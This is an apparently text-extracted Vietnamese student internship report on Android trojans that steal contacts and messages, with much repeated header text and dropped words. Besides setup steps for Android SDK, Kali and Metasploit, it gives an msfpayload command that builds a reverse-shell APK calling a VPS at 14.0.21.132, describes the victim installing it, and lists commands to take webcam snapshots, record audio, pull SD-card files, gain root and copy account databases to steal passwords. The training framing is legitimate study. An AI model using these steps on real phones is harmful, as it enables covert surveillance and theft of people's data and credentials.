Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN KHOA KỸ THUẬT MÁY TÍNH BÁO CÁO ĐỀ TÀI THỰC TẬP NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN DUY TÍN MSSV: 10520044 LỚP : KTMT05 Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín LỜI CẢM ƠN Em xin gởi lời cảm ơn chân thành tri ân sâu sắc Thầy anh chị nhân viên tạo điều kiện cho em thực tập Athena để thực tập Và em xin chân thành cám ơn Thầy Võ Đỗ Thắng nhiệt tình hướng dẫn hướng dẫn em hoàn thành tốt khóa thực tập Trong trình thực tập, trình làm báo cáo, khó tránh khỏi sai sót, mong Thầy bỏ qua Đồng thời trình độ lý luận kinh nghiệm thực tiễn hạn chế nên báo cáo tránh khỏi thiếu sót, em mong nhận ý kiến đóng góp Thầy để em học thêm nhiều kinh nghiệm Em xin chân thành cảm ơn ! Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín ĐÁNH GIÁ CỦA GVHD: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín MỤC LỤC LỜI CẢM ƠN ĐÁNH GIÁ CỦA GVHD: LỊCH LÀM VIỆC TẠI TRUNG TÂM GIỚI THIỆU TRUNG TÂM ATHENA NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO I NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP Cài đặt hệ điều hành Android 2.3 4.x môi trường giả lập .8 1.1 Cài đặt Java máy tính 1.2 Download Cài đặt Eclipse, Android SDK 10 1.3 Tạo máy AVD (Android Virtual Device) 12 SO SÁNH SỰ KHÁC NHAU GIỮA CÁC PHIÊN BẢN ANDROID .16 2.1 Sự khác yêu cầu phần cứng cần thiết để cài đặt 16 2.2 Sự khác giao diện 17 2.3 Sự khác tính 18 2.4 Sự khác giao thức mạng .19 NGHIÊN CỨU CÀI ĐẶT TROJAN, BACKDOOR TRÊN ANDROID (IMATCH) 19 NGHIÊN CỨU CÁC CHƯƠNG TRÌNH CÓ CHỨA MÃ ĐỘC (iCalendar) 19 4.1 Thực trạng 19 4.2 Nghiên cứu lỗ hổng bảo mật Android 20 4.3 Cài đặt trojan Android (iCalendar) .21 NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID 23 5.1 Tìm hiểu Kali Linux 23 5.2 Cài đặt Kali Linux máy ảo VMWare 24 5.3 Tạo mã độc Kali Linux để xâm nhập Android 33 II THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET .52 1.TRIỂN KHAI LÊN VPS 52 1.1 Cài đặt Metasploit lên VPS .52 2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET 59 KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP 64 LỊCH LÀM VIỆC TẠI TRUNG TÂM Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sáng thứ từ 10h đến 14h Bắt đầu từ ngày 5/3 đến kết thúc 24/5 GIỚI THIỆU TRUNG TÂM ATHENA Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA thành lập từ năm 2004, tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lãnh vực CNTT, với tâm huyết góp phần vào công thúc đẩy tiến trình đưa công nghệ thông tin ngành kinh tế mũi nhọn, góp phần phát triển nước nhà Lĩnh vực hoạt động chính: +Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI , CEH, Song song đó, trung tâm ATHENA có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, quan phủ, tổ chức tài + Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông tỉnh, bưu điện tỉnh,., + Ngoài chương trình đào tạo, Trung tâm ATHENA có nhiều chương trình hợp tác trao đổi công nghệ với nhiều đại học lớn đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự , Đội ngũ giảng viên : +Tất giảng viên trung tâm ATHENA có tốt nghiệp từ trường đại học hàng đầu nước Tất giảng viên ATHENA phải có chứng quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH,có sư phạm Quốc tế (Microsoft Certified Trainer).Đây chứng chuyên môn bắt buộc để đủ điều kiện tham gia Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín giảng dạy trung tâm ATHENA +Bên cạnh đó,Các giảng viên ATHENA thường tu nghiệp cập nhật kiến thức công nghệ từ nước tiên tiến Mỹ , Pháp, Hà Lan, Singapore, truyền đạt công nghệ chương trình đào tạo trung tâm ATHENA Cơ sở vật chất: +Thiết bị đầy đủ đại +Chương trình cập nhật liên tục, bảo đảm học viên tiếp cận với công nghệ +Phòng máy rộng rãi, thoáng mát Dịch vụ hỗ trợ: +Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn +Giới thiệu việc làm cho học viên +Thực tập có lương cho học viên giỏi +Ngoài học thức, học viên thực hành thêm miễn phí, không giới hạn thời gian +Hỗ trợ kỹ thuật không thời hạn tất lĩnh vực liên quan đến máy tính, mạng máy tính, bảo mật mạng +Hỗ trợ thi Chứng Quốc tế NỘI DUNG NHIỆM VỤ CHÍNH ĐƯỢC GIAO Phần 1.Cài đặt Android máy ảo 2.So sánh tính Android 2x 4x 3.Nghiên cứu cài đặt Backdoor, Trojan cho phép nghe điện thoại 4.Nghiên cứu chương trình có mã độc(iealender) 5.Nghien cứu Kali-Linux, chế tạo mã độc Kali-Linux==>> xâm nhập thẻ sdcard, kích hoạt camera,ghi âm thiết bị Andoid 6.Truyền liệu thẻ sdcard, camera, máy điều khiển từ xa Phần Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 1.Hướng dẫn cài đặt Metasploit lên VPS Sử dụng VPS để công Android phạm vi Internet Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín I NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP Cài đặt hệ điều hành Android 2.3 4.x môi trường giả lập 1.1 Cài đặt Java máy tính Để lập trình App cho Android máy tính bạn phải đặt toàn JDK Bạn download JDK địa : (Tùy vào phiên windows bạn 32bit 64bit bạn cần download cho phù hợp) Sau tải JDK máy bạn tiến hành cài đặt chúng Xuất cửa dổ cài đặt, bạn ấn Next… Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Và đợi trình cài đặt hoàn tất Sau cài xong, bạn kiểm tra lại xem JDK cài máy tính bạn chưa bẳng cách vào CMD gõ lệnh: “java” Nếu hình sau bạn hoàn thành rồi: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 1.2 Download Cài đặt Eclipse, Android SDK Trước tiên ta phải download Eclipse Các bạn vào địa : http://developer.android.com/sdk/index.html Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Dùng lệnh cd /sdcard/Download để vào thư mục Như hình, ta thấy file App.apk, để tải máy, ta nhập lệnh Download App.apk Và file tải thư mục root máy Kali Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín II THỰC HIỆN TRÊN MÔI TRƯỜNG INTERNET 1.TRIỂN KHAI LÊN VPS 1.1 Cài đặt Metasploit lên VPS Giới thiệu Metasploit công cụ khai thác lỗ hổng hệ điều hành, dùng để kiểm tra, công khai thác lỗi service Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với components viết C, assembler, Python Metasploit chạy hầu hết hệ điều hành: Linux, Windows, MacOS Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Cài đặt Tải gói cài đặt Metasploit, ta có phiên Pro Community Ta chọn phiên Community miễn phí dùng cho nghiên cứu Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau tải gói cài đặt Metasploit Community ta cài đặt phần mềm khác Chọn folder cài đặt: Cổng dịch vụ Metasploit sử dụng, mặc định 3790: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Chọn server ngày hết hạn, để mặc định: Quá trình cài đặt Metasploit: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Tiến trình hoàn tất, chọn Finish truy cập đến giao diện web chương trình: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau Finish trình duyệt web mở lên tới giao diện Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Click vào link: https://localhost:3790/ dẫn đến trang tạo tài khoản để login vào Metasploit Điền Username, Password sử dụng số thông tin bổ xung, chọn Create Account: Trình duyệt chuyển đến trang nhập key để active chương trình, key gửi miễn phí đến mail tải phần mềm Sau điền key nhấn Activate License: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 2.TỪ VPS ĐIỀU KHIỂN THIẾT BỊ QUA INTERNET Các bước thực Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android mang Lan với địa IP địa VPS Chúng ta sử dụng lệnh “Msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk” địa VPS 14.0.21.132 Khởi động Metasploit Console VPS Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Chúng ta thực bước xâm nhập đề cập phần trên, khác sử dụng IP VPS Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau máy nạn nhân tải file apk tạo ra, máy android bị hack Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sử dụng lệnh Help để xem lệnh metasploit hỗ trợ Để xem lệnh ta gõ help Để xem thông tin máy, nhập lệnh SysInfo Để xem tác vụ chạy gõ ps Xem ip gõ ipconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Để xem danh sách camera, nhập webcam_list Để chụp hình camera, nhập webcam_snap x với x id camera xem danh sách camera phần trước Ghi âm Để thực ghi âm, nhập lênh record_mic file ghi âm lưu máy Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải máy, ta nhập lệnh Download App.apk để upload gõ lệnh upload Và file tải thư mục root máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is tức root ls -l danh mục file quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk thay đổi quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách down load file hay thay đổi file ROM phải gõ lệnh SU để có toàn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data ^C để quay lại Sử dụng SQLite để mở file db Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín KẾT QUẢ ĐẠT ĐƯỢC QUA ĐỢT THỰC TẬP Những kiến thức lý thuyết củng cố: • • • • Tìm hiểu lịch sử, trình phát triển hệ điều hành Android Tìm hiểu hệ điều hành Kali Linux Tìm hiểu lỗ hổng bảo mật Windows Android Tìm hiểu cách sửa đổi file APK thực Signing ứng dụng Những kỹ thực hành học thêm: • Thực cài đặt Android máy ảo • Cài đặt Kali Linux, sử dụng để hack vào lỗ hổng bảo mật Windows Android • Thi lấy chứng System Hacking trung tâm Athena • Thực sửa đổi, tạo file Trojan, Backdoor sau cài đặt vào Android • Biết thêm số học lớp Hacker mũ trắng Những kinh nghiệm thực tiễn tích lũy được: Qua gần tháng thực tập, thân em đúc kết nhiều kinh nghiệm quý báu, thứ kĩ chuyên môn, em học cố kiến thức bên cạnh kiến thức tảng Hơn trình thực tập môi trường doanh nghiệp cho em làm quen dần để không bỡ ngỡ trình làm sau này, thông qua kĩ giao tiếp ứng xử [...]... Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Và đây là giao diện cuối cùng : Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 2 SO SÁNH SỰ KHÁC NHAU GIỮA CÁC... Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI... Boot-loader Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sau khi hoàn tất phần cuối và khởi động lại, đến... Chọn Yes Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Nhấn continue để bắt đầu cài đặt khoảng 15 phút Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy... Duy Tín Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Chọn Finish partitioning and write changes to disk Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy... Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Download bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle for Windows Sau khi download về, các bạn giải nén ra và sẽ có các file như sau : Để cài đặt Android SDK các bạn có 2 cách: Cách 1: Các bạn click chuột vào biểu tượng... ở ngoài và tiến hành cài đặt Cách 2: Các bạn khởi chạy Eclipse lên Rồi vào mục Android SDK Manager cũng được: Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Sẽ xuất hiện 1 cửa sổ mới như sau : Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vào... chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện được tất cả các camera trên thiết bị Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 2.4 Sự khác nhau về giao thức mạng Android 2.3 Android 4x Không hỗ trợ giao thức https Hỗ trợ giao thức https 3 NGHIÊN CỨU CÀI... name.apk 3.Cài đặt ứng dụng lên máy nạn nhân adb -s emulator-device install name.apk Demo cài đặt ứng dụng Icalendar và đã được minh họa trên clip đính kèm Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín 5 NGHIÊN CỨU KALI LINUX – SỬ DỤNG KALI LINUX ĐỂ HACK ANDROID 5.1 Tìm hiểu... Tập NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình ... NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN,. .. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN,. .. NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI SVTH: Nguyễn Duy Tín Báo Cáo Thực Tập NGHIÊN CỨU CÁC TROJAN,